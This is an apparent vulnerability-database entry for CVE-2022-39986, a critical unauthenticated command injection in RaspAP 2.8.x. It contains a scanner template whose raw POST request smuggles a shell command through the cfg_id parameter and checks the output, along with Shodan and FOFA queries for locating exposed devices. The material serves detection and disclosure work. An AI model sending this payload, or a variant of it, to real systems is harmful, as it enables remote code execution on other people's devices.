CVE-2022-39986: RaspAP 2.8.7 - Unauthenticated Command Injection

日期: 2025-08-01 | 影响软件: RaspAP 2.8.7 | POC: 已公开

漏洞描述

A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.

PoC代码[已公开]

id: CVE-2022-39986

info:
  name: RaspAP 2.8.7 - Unauthenticated Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39986
    - https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
    - http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
    - https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-39986
    cwe-id: CWE-77
    epss-score: 0.92638
    epss-percentile: 0.99736
    cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: raspap
    product: raspap
    shodan-query: http.favicon.hash:-1465760059
    fofa-query: icon_hash=-1465760059
  tags: cve,cve2022,packetstorm,raspap,rce

http:
  - raw:
      - |
        POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cfg_id=;id;#

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100858c39c152c1e15965cc2fdaeaf0a7bf49283f1840fd45ade1d7d7dc0e094f3d022100ae0be415a90e6b377acd3c0bcf34ca9d7578c859bdb973dc92fa5ca2e83c9128:922c64590222798bb761d5b6d8e72950